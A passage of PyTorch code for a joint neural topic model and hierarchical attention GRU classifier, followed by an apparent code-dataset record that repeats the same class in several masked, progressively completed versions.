r = F.tanh(temp2) + h
else:
r = temp2
else:
temp = F.tanh(self.generator1(h))
temp2 = F.tanh(self.generator2(temp))
temp3 = F.tanh(self.generator3(temp2))
temp4 = self.generator4(temp3)
if self.generator_shortcut:
r = F.tanh(temp4) + h
else:
r = temp4
if self.generator_transform == 'tanh':
return self.r_drop(F.tanh(r))
elif self.generator_transform == 'softmax':
return self.r_drop(F.softmax(r)[0])
elif self.generator_transform == 'relu':
return self.r_drop(F.relu(r))
else:
return self.r_drop(r)
def decoder(self, r):
# p_x_given_h = F.softmax(self.de_bn(self.de(r)))
p_x_given_h = F.softmax(self.de(r))
return p_x_given_h
def init_rnn_hidden(self, batch_size, level):
param_data = next(self.parameters()).data
if level == "word":
bidirectional_multipier = 2 if self.word_rnn_bidirectional else 1
layer_size = self.word_rnn_num_layer * bidirectional_multipier
word_rnn_init_hidden = param_data.new(layer_size, batch_size, self.word_rnn_size).zero_()
return word_rnn_init_hidden
elif level == "context":
bidirectional_multipier = 2 if self.context_rnn_bidirectional else 1
layer_size = self.context_rnn_num_layer * bidirectional_multipier
context_rnn_init_hidden = param_data.new(layer_size, batch_size, self.context_rnn_size).zero_()
return context_rnn_init_hidden
else:
raise Exception("level must be 'word' or 'context'")
def continuous_parameters(self):
for name, param in self.named_parameters():
if not name.startswith("selector"):
yield param
def discrete_parameters(self):
for name, param in self.named_parameters():
if name.startswith("selector"):
yield param
def forward(self, x, x_indices, input_list, length_list, cuda):
###topic model
mean, logvar = self.encoder(x) # batchsize*50
h = self.sampler(mean, logvar, cuda) # batchsize*50
r = self.generator(h) # batchsize*50
p_x_given_h = self.decoder(r) # batchsize*dv
###HAN
        num_utterance = len(input_list) # number of utterances per document in this batch
_, batch_size = input_list[0].size()
# word-level rnn
word_rnn_hidden = self.init_rnn_hidden(batch_size, level="word")
word_rnn_output_list = []
word_attention_dict = {}
# de_weight = torch.zeros(self.d_v, self.d_t).cuda()
# de_weight.copy_(self.de.weight.data)
for utterance_index in range(num_utterance):
word_rnn_input = self.embedding(input_list[utterance_index])
word_rnn_output, word_rnn_hidden = self.word_rnn(word_rnn_input, word_rnn_hidden)
word_attention_weight = self.word_conv_attention_linear(word_rnn_output)
# word_attention_weight = Variable(torch.zeros(word_attention_weight.size()).cuda())
batch_data = input_list[utterance_index]
            for word_i in range(len(batch_data)): # iterate over word positions in this utterance
                for clause_i in range(len(batch_data[word_i])): # iterate over examples in the batch
                    word_index = int(batch_data[word_i, clause_i]) # vocabulary index of this token
if word_index < self.d_v:
if word_index in word_attention_dict:
word_attention_dict[word_index] = (word_attention_dict[word_index] + word_attention_weight[word_i, clause_i,:]) / 2
else:
word_attention_dict[word_index] = word_attention_weight[word_i, clause_i, :]
##HAN
word_attention_weight = self.word_conv_attention_linear2(word_attention_weight)
word_attention_weight = nn.functional.relu(word_attention_weight)
word_attention_weight = nn.functional.softmax(word_attention_weight, dim=0)
word_rnn_last_output = torch.mul(word_rnn_output, word_attention_weight).sum(dim=0)
word_rnn_output_list.append(word_rnn_last_output)
word_rnn_hidden = word_rnn_hidden.detach()
# context-level rnn
context_rnn_hidden = self.init_rnn_hidden(batch_size, level="context")
context_rnn_input = torch.stack(word_rnn_output_list, dim=0)
context_rnn_output, context_rnn_hidden = self.context_rnn(context_rnn_input, context_rnn_hidden)
context_attention_weight = self.context_conv_attention_linear(context_rnn_output)
context_attention_weight = nn.functional.relu(context_attention_weight)
context_attention_weight = nn.functional.softmax(context_attention_weight, dim=0)
context_rnn_last_output = torch.mul(context_rnn_output, context_attention_weight).sum(dim=0)
classifier_input = context_rnn_last_output
logit = self.classifier(classifier_input)
return mean, logvar, p_x_given_h, logit, word_attention_dict
|
normal
|
{
"blob_id": "4f3e297b6925f8d65aacaa59bb837e746747c33f",
"index": 2608,
"step-1": "<mask token>\n\n\nclass JointModel(nn.Module):\n\n def __init__(self, d_v, d_e, d_t, encoder_layers, generator_layers,\n encoder_shortcut, generator_shortcut, generator_transform, num_word,\n emb_size, word_rnn_size, word_rnn_num_layer, word_rnn_dropout,\n word_rnn_bidirectional, word_attention_size, context_rnn_size,\n context_rnn_num_layer, context_rnn_dropout,\n context_rnn_bidirectional, context_attention_size, mlp_size,\n num_label, pretrained_embedding):\n super(JointModel, self).__init__()\n self.d_v = d_v\n self.d_e = d_e\n self.d_t = d_t\n self.encoder_layers = encoder_layers\n self.generator_layers = generator_layers\n self.generator_transform = generator_transform\n self.encoder_shortcut = encoder_shortcut\n self.generator_shortcut = generator_shortcut\n self.en1_fc = nn.Linear(self.d_v, self.d_e)\n self.en2_fc = nn.Linear(self.d_e, self.d_e)\n self.en_drop = nn.Dropout(0.2)\n self.mean_fc = nn.Linear(self.d_e, self.d_t)\n self.logvar_fc = nn.Linear(self.d_e, self.d_t)\n self.generator1 = nn.Linear(self.d_t, self.d_t)\n self.generator2 = nn.Linear(self.d_t, self.d_t)\n self.generator3 = nn.Linear(self.d_t, self.d_t)\n self.generator4 = nn.Linear(self.d_t, self.d_t)\n self.r_drop = nn.Dropout(0.2)\n self.de = nn.Linear(self.d_t, self.d_v)\n self.emb_size = emb_size\n self.word_rnn_size = word_rnn_size\n self.word_rnn_num_layer = word_rnn_num_layer\n self.word_rnn_bidirectional = word_rnn_bidirectional\n self.context_rnn_size = context_rnn_size\n self.context_rnn_num_layer = context_rnn_num_layer\n self.context_rnn_bidirectional = context_rnn_bidirectional\n self.num_label = num_label\n self.embedding = nn.Embedding(num_word, emb_size)\n self.word_rnn = nn.GRU(input_size=emb_size, hidden_size=\n word_rnn_size, dropout=word_rnn_dropout, num_layers=\n word_rnn_num_layer, bidirectional=word_rnn_bidirectional)\n word_rnn_output_size = (word_rnn_size * 2 if word_rnn_bidirectional\n else word_rnn_size)\n self.word_conv_attention_linear = nn.Linear(word_rnn_output_size,\n self.d_t, bias=False)\n self.word_conv_attention_linear2 = nn.Linear(self.d_t, 1, bias=False)\n self.context_rnn = nn.GRU(input_size=word_rnn_output_size,\n hidden_size=context_rnn_size, dropout=context_rnn_dropout,\n num_layers=context_rnn_num_layer, bidirectional=\n context_rnn_bidirectional)\n context_rnn_output_size = (context_rnn_size * 2 if\n context_rnn_bidirectional else context_rnn_size)\n self.context_conv_attention_linear = nn.Linear(context_rnn_output_size,\n 1, bias=False)\n self.classifier = nn.Sequential(nn.Linear(context_rnn_output_size,\n mlp_size), nn.LeakyReLU(), nn.Linear(mlp_size, num_label), nn.\n Tanh())\n if pretrained_embedding is not None:\n self.embedding.weight.data = self.embedding.weight.data.new(\n pretrained_embedding)\n\n def encoder(self, x):\n if self.encoder_layers == 1:\n pi = F.relu(self.en1_fc(x))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n else:\n pi = F.relu(self.en1_fc(x))\n pi = F.relu(self.en2_fc(pi))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n mean = self.mean_fc(pi)\n logvar = self.logvar_fc(pi)\n return mean, logvar\n <mask token>\n\n def generator(self, h):\n if self.generator_layers == 0:\n r = h\n elif self.generator_layers == 1:\n temp = self.generator1(h)\n if self.generator_shortcut:\n r = F.tanh(temp) + h\n else:\n r = temp\n elif self.generator_layers == 2:\n temp = F.tanh(self.generator1(h))\n temp2 = self.generator2(temp)\n if self.generator_shortcut:\n r = F.tanh(temp2) + h\n else:\n r = temp2\n else:\n temp = 
F.tanh(self.generator1(h))\n temp2 = F.tanh(self.generator2(temp))\n temp3 = F.tanh(self.generator3(temp2))\n temp4 = self.generator4(temp3)\n if self.generator_shortcut:\n r = F.tanh(temp4) + h\n else:\n r = temp4\n if self.generator_transform == 'tanh':\n return self.r_drop(F.tanh(r))\n elif self.generator_transform == 'softmax':\n return self.r_drop(F.softmax(r)[0])\n elif self.generator_transform == 'relu':\n return self.r_drop(F.relu(r))\n else:\n return self.r_drop(r)\n <mask token>\n <mask token>\n <mask token>\n\n def discrete_parameters(self):\n for name, param in self.named_parameters():\n if name.startswith('selector'):\n yield param\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass JointModel(nn.Module):\n\n def __init__(self, d_v, d_e, d_t, encoder_layers, generator_layers,\n encoder_shortcut, generator_shortcut, generator_transform, num_word,\n emb_size, word_rnn_size, word_rnn_num_layer, word_rnn_dropout,\n word_rnn_bidirectional, word_attention_size, context_rnn_size,\n context_rnn_num_layer, context_rnn_dropout,\n context_rnn_bidirectional, context_attention_size, mlp_size,\n num_label, pretrained_embedding):\n super(JointModel, self).__init__()\n self.d_v = d_v\n self.d_e = d_e\n self.d_t = d_t\n self.encoder_layers = encoder_layers\n self.generator_layers = generator_layers\n self.generator_transform = generator_transform\n self.encoder_shortcut = encoder_shortcut\n self.generator_shortcut = generator_shortcut\n self.en1_fc = nn.Linear(self.d_v, self.d_e)\n self.en2_fc = nn.Linear(self.d_e, self.d_e)\n self.en_drop = nn.Dropout(0.2)\n self.mean_fc = nn.Linear(self.d_e, self.d_t)\n self.logvar_fc = nn.Linear(self.d_e, self.d_t)\n self.generator1 = nn.Linear(self.d_t, self.d_t)\n self.generator2 = nn.Linear(self.d_t, self.d_t)\n self.generator3 = nn.Linear(self.d_t, self.d_t)\n self.generator4 = nn.Linear(self.d_t, self.d_t)\n self.r_drop = nn.Dropout(0.2)\n self.de = nn.Linear(self.d_t, self.d_v)\n self.emb_size = emb_size\n self.word_rnn_size = word_rnn_size\n self.word_rnn_num_layer = word_rnn_num_layer\n self.word_rnn_bidirectional = word_rnn_bidirectional\n self.context_rnn_size = context_rnn_size\n self.context_rnn_num_layer = context_rnn_num_layer\n self.context_rnn_bidirectional = context_rnn_bidirectional\n self.num_label = num_label\n self.embedding = nn.Embedding(num_word, emb_size)\n self.word_rnn = nn.GRU(input_size=emb_size, hidden_size=\n word_rnn_size, dropout=word_rnn_dropout, num_layers=\n word_rnn_num_layer, bidirectional=word_rnn_bidirectional)\n word_rnn_output_size = (word_rnn_size * 2 if word_rnn_bidirectional\n else word_rnn_size)\n self.word_conv_attention_linear = nn.Linear(word_rnn_output_size,\n self.d_t, bias=False)\n self.word_conv_attention_linear2 = nn.Linear(self.d_t, 1, bias=False)\n self.context_rnn = nn.GRU(input_size=word_rnn_output_size,\n hidden_size=context_rnn_size, dropout=context_rnn_dropout,\n num_layers=context_rnn_num_layer, bidirectional=\n context_rnn_bidirectional)\n context_rnn_output_size = (context_rnn_size * 2 if\n context_rnn_bidirectional else context_rnn_size)\n self.context_conv_attention_linear = nn.Linear(context_rnn_output_size,\n 1, bias=False)\n self.classifier = nn.Sequential(nn.Linear(context_rnn_output_size,\n mlp_size), nn.LeakyReLU(), nn.Linear(mlp_size, num_label), nn.\n Tanh())\n if pretrained_embedding is not None:\n self.embedding.weight.data = self.embedding.weight.data.new(\n pretrained_embedding)\n\n def encoder(self, x):\n if self.encoder_layers == 1:\n pi = F.relu(self.en1_fc(x))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n else:\n pi = F.relu(self.en1_fc(x))\n pi = F.relu(self.en2_fc(pi))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n mean = self.mean_fc(pi)\n logvar = self.logvar_fc(pi)\n return mean, logvar\n <mask token>\n\n def generator(self, h):\n if self.generator_layers == 0:\n r = h\n elif self.generator_layers == 1:\n temp = self.generator1(h)\n if self.generator_shortcut:\n r = F.tanh(temp) + h\n else:\n r = temp\n elif self.generator_layers == 2:\n temp = F.tanh(self.generator1(h))\n temp2 = self.generator2(temp)\n if self.generator_shortcut:\n r = F.tanh(temp2) + h\n else:\n r = temp2\n else:\n temp = 
F.tanh(self.generator1(h))\n temp2 = F.tanh(self.generator2(temp))\n temp3 = F.tanh(self.generator3(temp2))\n temp4 = self.generator4(temp3)\n if self.generator_shortcut:\n r = F.tanh(temp4) + h\n else:\n r = temp4\n if self.generator_transform == 'tanh':\n return self.r_drop(F.tanh(r))\n elif self.generator_transform == 'softmax':\n return self.r_drop(F.softmax(r)[0])\n elif self.generator_transform == 'relu':\n return self.r_drop(F.relu(r))\n else:\n return self.r_drop(r)\n <mask token>\n\n def init_rnn_hidden(self, batch_size, level):\n param_data = next(self.parameters()).data\n if level == 'word':\n bidirectional_multipier = 2 if self.word_rnn_bidirectional else 1\n layer_size = self.word_rnn_num_layer * bidirectional_multipier\n word_rnn_init_hidden = param_data.new(layer_size, batch_size,\n self.word_rnn_size).zero_()\n return word_rnn_init_hidden\n elif level == 'context':\n bidirectional_multipier = (2 if self.context_rnn_bidirectional else\n 1)\n layer_size = self.context_rnn_num_layer * bidirectional_multipier\n context_rnn_init_hidden = param_data.new(layer_size, batch_size,\n self.context_rnn_size).zero_()\n return context_rnn_init_hidden\n else:\n raise Exception(\"level must be 'word' or 'context'\")\n <mask token>\n\n def discrete_parameters(self):\n for name, param in self.named_parameters():\n if name.startswith('selector'):\n yield param\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass JointModel(nn.Module):\n\n def __init__(self, d_v, d_e, d_t, encoder_layers, generator_layers,\n encoder_shortcut, generator_shortcut, generator_transform, num_word,\n emb_size, word_rnn_size, word_rnn_num_layer, word_rnn_dropout,\n word_rnn_bidirectional, word_attention_size, context_rnn_size,\n context_rnn_num_layer, context_rnn_dropout,\n context_rnn_bidirectional, context_attention_size, mlp_size,\n num_label, pretrained_embedding):\n super(JointModel, self).__init__()\n self.d_v = d_v\n self.d_e = d_e\n self.d_t = d_t\n self.encoder_layers = encoder_layers\n self.generator_layers = generator_layers\n self.generator_transform = generator_transform\n self.encoder_shortcut = encoder_shortcut\n self.generator_shortcut = generator_shortcut\n self.en1_fc = nn.Linear(self.d_v, self.d_e)\n self.en2_fc = nn.Linear(self.d_e, self.d_e)\n self.en_drop = nn.Dropout(0.2)\n self.mean_fc = nn.Linear(self.d_e, self.d_t)\n self.logvar_fc = nn.Linear(self.d_e, self.d_t)\n self.generator1 = nn.Linear(self.d_t, self.d_t)\n self.generator2 = nn.Linear(self.d_t, self.d_t)\n self.generator3 = nn.Linear(self.d_t, self.d_t)\n self.generator4 = nn.Linear(self.d_t, self.d_t)\n self.r_drop = nn.Dropout(0.2)\n self.de = nn.Linear(self.d_t, self.d_v)\n self.emb_size = emb_size\n self.word_rnn_size = word_rnn_size\n self.word_rnn_num_layer = word_rnn_num_layer\n self.word_rnn_bidirectional = word_rnn_bidirectional\n self.context_rnn_size = context_rnn_size\n self.context_rnn_num_layer = context_rnn_num_layer\n self.context_rnn_bidirectional = context_rnn_bidirectional\n self.num_label = num_label\n self.embedding = nn.Embedding(num_word, emb_size)\n self.word_rnn = nn.GRU(input_size=emb_size, hidden_size=\n word_rnn_size, dropout=word_rnn_dropout, num_layers=\n word_rnn_num_layer, bidirectional=word_rnn_bidirectional)\n word_rnn_output_size = (word_rnn_size * 2 if word_rnn_bidirectional\n else word_rnn_size)\n self.word_conv_attention_linear = nn.Linear(word_rnn_output_size,\n self.d_t, bias=False)\n self.word_conv_attention_linear2 = nn.Linear(self.d_t, 1, bias=False)\n self.context_rnn = nn.GRU(input_size=word_rnn_output_size,\n hidden_size=context_rnn_size, dropout=context_rnn_dropout,\n num_layers=context_rnn_num_layer, bidirectional=\n context_rnn_bidirectional)\n context_rnn_output_size = (context_rnn_size * 2 if\n context_rnn_bidirectional else context_rnn_size)\n self.context_conv_attention_linear = nn.Linear(context_rnn_output_size,\n 1, bias=False)\n self.classifier = nn.Sequential(nn.Linear(context_rnn_output_size,\n mlp_size), nn.LeakyReLU(), nn.Linear(mlp_size, num_label), nn.\n Tanh())\n if pretrained_embedding is not None:\n self.embedding.weight.data = self.embedding.weight.data.new(\n pretrained_embedding)\n\n def encoder(self, x):\n if self.encoder_layers == 1:\n pi = F.relu(self.en1_fc(x))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n else:\n pi = F.relu(self.en1_fc(x))\n pi = F.relu(self.en2_fc(pi))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n mean = self.mean_fc(pi)\n logvar = self.logvar_fc(pi)\n return mean, logvar\n\n def sampler(self, mean, logvar, cuda):\n eps = torch.randn(mean.size()).cuda(cuda)\n sigma = torch.exp(logvar)\n h = sigma.mul(eps).add_(mean)\n return h\n\n def generator(self, h):\n if self.generator_layers == 0:\n r = h\n elif self.generator_layers == 1:\n temp = self.generator1(h)\n if self.generator_shortcut:\n r = F.tanh(temp) + h\n else:\n r = temp\n elif self.generator_layers == 2:\n temp = F.tanh(self.generator1(h))\n 
temp2 = self.generator2(temp)\n if self.generator_shortcut:\n r = F.tanh(temp2) + h\n else:\n r = temp2\n else:\n temp = F.tanh(self.generator1(h))\n temp2 = F.tanh(self.generator2(temp))\n temp3 = F.tanh(self.generator3(temp2))\n temp4 = self.generator4(temp3)\n if self.generator_shortcut:\n r = F.tanh(temp4) + h\n else:\n r = temp4\n if self.generator_transform == 'tanh':\n return self.r_drop(F.tanh(r))\n elif self.generator_transform == 'softmax':\n return self.r_drop(F.softmax(r)[0])\n elif self.generator_transform == 'relu':\n return self.r_drop(F.relu(r))\n else:\n return self.r_drop(r)\n <mask token>\n\n def init_rnn_hidden(self, batch_size, level):\n param_data = next(self.parameters()).data\n if level == 'word':\n bidirectional_multipier = 2 if self.word_rnn_bidirectional else 1\n layer_size = self.word_rnn_num_layer * bidirectional_multipier\n word_rnn_init_hidden = param_data.new(layer_size, batch_size,\n self.word_rnn_size).zero_()\n return word_rnn_init_hidden\n elif level == 'context':\n bidirectional_multipier = (2 if self.context_rnn_bidirectional else\n 1)\n layer_size = self.context_rnn_num_layer * bidirectional_multipier\n context_rnn_init_hidden = param_data.new(layer_size, batch_size,\n self.context_rnn_size).zero_()\n return context_rnn_init_hidden\n else:\n raise Exception(\"level must be 'word' or 'context'\")\n\n def continuous_parameters(self):\n for name, param in self.named_parameters():\n if not name.startswith('selector'):\n yield param\n\n def discrete_parameters(self):\n for name, param in self.named_parameters():\n if name.startswith('selector'):\n yield param\n <mask token>\n",
"step-4": "import torch\nfrom torch import nn\nimport torch.nn.functional as F\n\n\nclass JointModel(nn.Module):\n\n def __init__(self, d_v, d_e, d_t, encoder_layers, generator_layers,\n encoder_shortcut, generator_shortcut, generator_transform, num_word,\n emb_size, word_rnn_size, word_rnn_num_layer, word_rnn_dropout,\n word_rnn_bidirectional, word_attention_size, context_rnn_size,\n context_rnn_num_layer, context_rnn_dropout,\n context_rnn_bidirectional, context_attention_size, mlp_size,\n num_label, pretrained_embedding):\n super(JointModel, self).__init__()\n self.d_v = d_v\n self.d_e = d_e\n self.d_t = d_t\n self.encoder_layers = encoder_layers\n self.generator_layers = generator_layers\n self.generator_transform = generator_transform\n self.encoder_shortcut = encoder_shortcut\n self.generator_shortcut = generator_shortcut\n self.en1_fc = nn.Linear(self.d_v, self.d_e)\n self.en2_fc = nn.Linear(self.d_e, self.d_e)\n self.en_drop = nn.Dropout(0.2)\n self.mean_fc = nn.Linear(self.d_e, self.d_t)\n self.logvar_fc = nn.Linear(self.d_e, self.d_t)\n self.generator1 = nn.Linear(self.d_t, self.d_t)\n self.generator2 = nn.Linear(self.d_t, self.d_t)\n self.generator3 = nn.Linear(self.d_t, self.d_t)\n self.generator4 = nn.Linear(self.d_t, self.d_t)\n self.r_drop = nn.Dropout(0.2)\n self.de = nn.Linear(self.d_t, self.d_v)\n self.emb_size = emb_size\n self.word_rnn_size = word_rnn_size\n self.word_rnn_num_layer = word_rnn_num_layer\n self.word_rnn_bidirectional = word_rnn_bidirectional\n self.context_rnn_size = context_rnn_size\n self.context_rnn_num_layer = context_rnn_num_layer\n self.context_rnn_bidirectional = context_rnn_bidirectional\n self.num_label = num_label\n self.embedding = nn.Embedding(num_word, emb_size)\n self.word_rnn = nn.GRU(input_size=emb_size, hidden_size=\n word_rnn_size, dropout=word_rnn_dropout, num_layers=\n word_rnn_num_layer, bidirectional=word_rnn_bidirectional)\n word_rnn_output_size = (word_rnn_size * 2 if word_rnn_bidirectional\n else word_rnn_size)\n self.word_conv_attention_linear = nn.Linear(word_rnn_output_size,\n self.d_t, bias=False)\n self.word_conv_attention_linear2 = nn.Linear(self.d_t, 1, bias=False)\n self.context_rnn = nn.GRU(input_size=word_rnn_output_size,\n hidden_size=context_rnn_size, dropout=context_rnn_dropout,\n num_layers=context_rnn_num_layer, bidirectional=\n context_rnn_bidirectional)\n context_rnn_output_size = (context_rnn_size * 2 if\n context_rnn_bidirectional else context_rnn_size)\n self.context_conv_attention_linear = nn.Linear(context_rnn_output_size,\n 1, bias=False)\n self.classifier = nn.Sequential(nn.Linear(context_rnn_output_size,\n mlp_size), nn.LeakyReLU(), nn.Linear(mlp_size, num_label), nn.\n Tanh())\n if pretrained_embedding is not None:\n self.embedding.weight.data = self.embedding.weight.data.new(\n pretrained_embedding)\n\n def encoder(self, x):\n if self.encoder_layers == 1:\n pi = F.relu(self.en1_fc(x))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n else:\n pi = F.relu(self.en1_fc(x))\n pi = F.relu(self.en2_fc(pi))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n mean = self.mean_fc(pi)\n logvar = self.logvar_fc(pi)\n return mean, logvar\n\n def sampler(self, mean, logvar, cuda):\n eps = torch.randn(mean.size()).cuda(cuda)\n sigma = torch.exp(logvar)\n h = sigma.mul(eps).add_(mean)\n return h\n\n def generator(self, h):\n if self.generator_layers == 0:\n r = h\n elif self.generator_layers == 1:\n temp = self.generator1(h)\n if self.generator_shortcut:\n r = F.tanh(temp) + h\n else:\n r = temp\n elif 
self.generator_layers == 2:\n temp = F.tanh(self.generator1(h))\n temp2 = self.generator2(temp)\n if self.generator_shortcut:\n r = F.tanh(temp2) + h\n else:\n r = temp2\n else:\n temp = F.tanh(self.generator1(h))\n temp2 = F.tanh(self.generator2(temp))\n temp3 = F.tanh(self.generator3(temp2))\n temp4 = self.generator4(temp3)\n if self.generator_shortcut:\n r = F.tanh(temp4) + h\n else:\n r = temp4\n if self.generator_transform == 'tanh':\n return self.r_drop(F.tanh(r))\n elif self.generator_transform == 'softmax':\n return self.r_drop(F.softmax(r)[0])\n elif self.generator_transform == 'relu':\n return self.r_drop(F.relu(r))\n else:\n return self.r_drop(r)\n\n def decoder(self, r):\n p_x_given_h = F.softmax(self.de(r))\n return p_x_given_h\n\n def init_rnn_hidden(self, batch_size, level):\n param_data = next(self.parameters()).data\n if level == 'word':\n bidirectional_multipier = 2 if self.word_rnn_bidirectional else 1\n layer_size = self.word_rnn_num_layer * bidirectional_multipier\n word_rnn_init_hidden = param_data.new(layer_size, batch_size,\n self.word_rnn_size).zero_()\n return word_rnn_init_hidden\n elif level == 'context':\n bidirectional_multipier = (2 if self.context_rnn_bidirectional else\n 1)\n layer_size = self.context_rnn_num_layer * bidirectional_multipier\n context_rnn_init_hidden = param_data.new(layer_size, batch_size,\n self.context_rnn_size).zero_()\n return context_rnn_init_hidden\n else:\n raise Exception(\"level must be 'word' or 'context'\")\n\n def continuous_parameters(self):\n for name, param in self.named_parameters():\n if not name.startswith('selector'):\n yield param\n\n def discrete_parameters(self):\n for name, param in self.named_parameters():\n if name.startswith('selector'):\n yield param\n\n def forward(self, x, x_indices, input_list, length_list, cuda):\n mean, logvar = self.encoder(x)\n h = self.sampler(mean, logvar, cuda)\n r = self.generator(h)\n p_x_given_h = self.decoder(r)\n num_utterance = len(input_list)\n _, batch_size = input_list[0].size()\n word_rnn_hidden = self.init_rnn_hidden(batch_size, level='word')\n word_rnn_output_list = []\n word_attention_dict = {}\n for utterance_index in range(num_utterance):\n word_rnn_input = self.embedding(input_list[utterance_index])\n word_rnn_output, word_rnn_hidden = self.word_rnn(word_rnn_input,\n word_rnn_hidden)\n word_attention_weight = self.word_conv_attention_linear(\n word_rnn_output)\n batch_data = input_list[utterance_index]\n for word_i in range(len(batch_data)):\n for clause_i in range(len(batch_data[word_i])):\n word_index = int(batch_data[word_i, clause_i])\n if word_index < self.d_v:\n if word_index in word_attention_dict:\n word_attention_dict[word_index] = (\n word_attention_dict[word_index] +\n word_attention_weight[word_i, clause_i, :]) / 2\n else:\n word_attention_dict[word_index\n ] = word_attention_weight[word_i, clause_i, :]\n word_attention_weight = self.word_conv_attention_linear2(\n word_attention_weight)\n word_attention_weight = nn.functional.relu(word_attention_weight)\n word_attention_weight = nn.functional.softmax(word_attention_weight\n , dim=0)\n word_rnn_last_output = torch.mul(word_rnn_output,\n word_attention_weight).sum(dim=0)\n word_rnn_output_list.append(word_rnn_last_output)\n word_rnn_hidden = word_rnn_hidden.detach()\n context_rnn_hidden = self.init_rnn_hidden(batch_size, level='context')\n context_rnn_input = torch.stack(word_rnn_output_list, dim=0)\n context_rnn_output, context_rnn_hidden = self.context_rnn(\n context_rnn_input, context_rnn_hidden)\n 
context_attention_weight = self.context_conv_attention_linear(\n context_rnn_output)\n context_attention_weight = nn.functional.relu(context_attention_weight)\n context_attention_weight = nn.functional.softmax(\n context_attention_weight, dim=0)\n context_rnn_last_output = torch.mul(context_rnn_output,\n context_attention_weight).sum(dim=0)\n classifier_input = context_rnn_last_output\n logit = self.classifier(classifier_input)\n return mean, logvar, p_x_given_h, logit, word_attention_dict\n",
"step-5": "import torch\nfrom torch import nn\nimport torch.nn.functional as F\n\nclass JointModel(nn.Module):\n def __init__(self, d_v, d_e, d_t, encoder_layers, generator_layers,encoder_shortcut, generator_shortcut, generator_transform,\n num_word, emb_size, word_rnn_size, word_rnn_num_layer, word_rnn_dropout, word_rnn_bidirectional,word_attention_size,\n context_rnn_size, context_rnn_num_layer, context_rnn_dropout, context_rnn_bidirectional,context_attention_size, mlp_size,\n num_label, pretrained_embedding):\n\n super(JointModel, self).__init__()\n\n ##NGTM:\n self.d_v = d_v # vocabulary size\n self.d_e = d_e # dimensionality of encoder\n self.d_t = d_t # number of topics\n self.encoder_layers = encoder_layers\n self.generator_layers = generator_layers\n self.generator_transform = generator_transform # transform to apply after the generator\n self.encoder_shortcut = encoder_shortcut\n self.generator_shortcut = generator_shortcut\n self.en1_fc = nn.Linear(self.d_v, self.d_e)\n self.en2_fc = nn.Linear(self.d_e, self.d_e)\n self.en_drop = nn.Dropout(0.2)\n self.mean_fc = nn.Linear(self.d_e, self.d_t)\n # self.mean_bn = nn.BatchNorm1d(self.d_t)\n self.logvar_fc = nn.Linear(self.d_e, self.d_t)\n # self.logvar_bn = nn.BatchNorm1d(self.d_t)\n self.generator1 = nn.Linear(self.d_t, self.d_t)\n self.generator2 = nn.Linear(self.d_t, self.d_t)\n self.generator3 = nn.Linear(self.d_t, self.d_t)\n self.generator4 = nn.Linear(self.d_t, self.d_t)\n self.r_drop = nn.Dropout(0.2)\n self.de = nn.Linear(self.d_t, self.d_v)\n # self.de_bn = nn.BatchNorm1d(self.d_v)\n\n ##HAN:\n self.emb_size = emb_size\n self.word_rnn_size = word_rnn_size\n self.word_rnn_num_layer = word_rnn_num_layer\n self.word_rnn_bidirectional = word_rnn_bidirectional\n self.context_rnn_size = context_rnn_size\n self.context_rnn_num_layer = context_rnn_num_layer\n self.context_rnn_bidirectional = context_rnn_bidirectional\n self.num_label = num_label\n self.embedding = nn.Embedding(num_word, emb_size)\n self.word_rnn = nn.GRU(input_size=emb_size, hidden_size=word_rnn_size, dropout=word_rnn_dropout,\n num_layers=word_rnn_num_layer, bidirectional=word_rnn_bidirectional)\n word_rnn_output_size = word_rnn_size * 2 if word_rnn_bidirectional else word_rnn_size\n self.word_conv_attention_linear = nn.Linear(word_rnn_output_size, self.d_t, bias=False)\n self.word_conv_attention_linear2 = nn.Linear(self.d_t, 1, bias=False)\n self.context_rnn = nn.GRU(input_size=word_rnn_output_size, hidden_size=context_rnn_size,dropout=context_rnn_dropout,\n num_layers=context_rnn_num_layer, bidirectional=context_rnn_bidirectional)\n context_rnn_output_size = context_rnn_size * 2 if context_rnn_bidirectional else context_rnn_size\n self.context_conv_attention_linear = nn.Linear(context_rnn_output_size, 1, bias=False)\n self.classifier = nn.Sequential(nn.Linear(context_rnn_output_size, mlp_size),\n nn.LeakyReLU(),\n nn.Linear(mlp_size, num_label),\n nn.Tanh())\n if pretrained_embedding is not None:\n self.embedding.weight.data = self.embedding.weight.data.new(pretrained_embedding)\n\n\n def encoder(self, x):\n if self.encoder_layers == 1:\n pi = F.relu(self.en1_fc(x))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n else:\n pi = F.relu(self.en1_fc(x))\n pi = F.relu(self.en2_fc(pi))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n\n # mean = self.mean_bn(self.mean_fc(pi))\n # logvar = self.logvar_bn(self.logvar_fc(pi))\n mean = self.mean_fc(pi)\n logvar = self.logvar_fc(pi)\n return mean, logvar\n\n def sampler(self, mean, logvar, cuda):\n eps = 
torch.randn(mean.size()).cuda(cuda)\n sigma = torch.exp(logvar)\n h = sigma.mul(eps).add_(mean)\n return h\n\n def generator(self, h):\n# temp = self.generator1(h)\n# if self.generator_shortcut:\n# r = F.tanh(temp) + h\n# else:\n# r = temp\n if self.generator_layers == 0:\n r = h\n elif self.generator_layers == 1:\n temp = self.generator1(h)\n if self.generator_shortcut:\n r = F.tanh(temp) + h\n else:\n r = temp\n elif self.generator_layers == 2:\n temp = F.tanh(self.generator1(h))\n temp2 = self.generator2(temp)\n if self.generator_shortcut:\n r = F.tanh(temp2) + h\n else:\n r = temp2\n else:\n temp = F.tanh(self.generator1(h))\n temp2 = F.tanh(self.generator2(temp))\n temp3 = F.tanh(self.generator3(temp2))\n temp4 = self.generator4(temp3)\n if self.generator_shortcut:\n r = F.tanh(temp4) + h\n else:\n r = temp4\n\n if self.generator_transform == 'tanh':\n return self.r_drop(F.tanh(r))\n elif self.generator_transform == 'softmax':\n return self.r_drop(F.softmax(r)[0])\n elif self.generator_transform == 'relu':\n return self.r_drop(F.relu(r))\n else:\n return self.r_drop(r)\n\n def 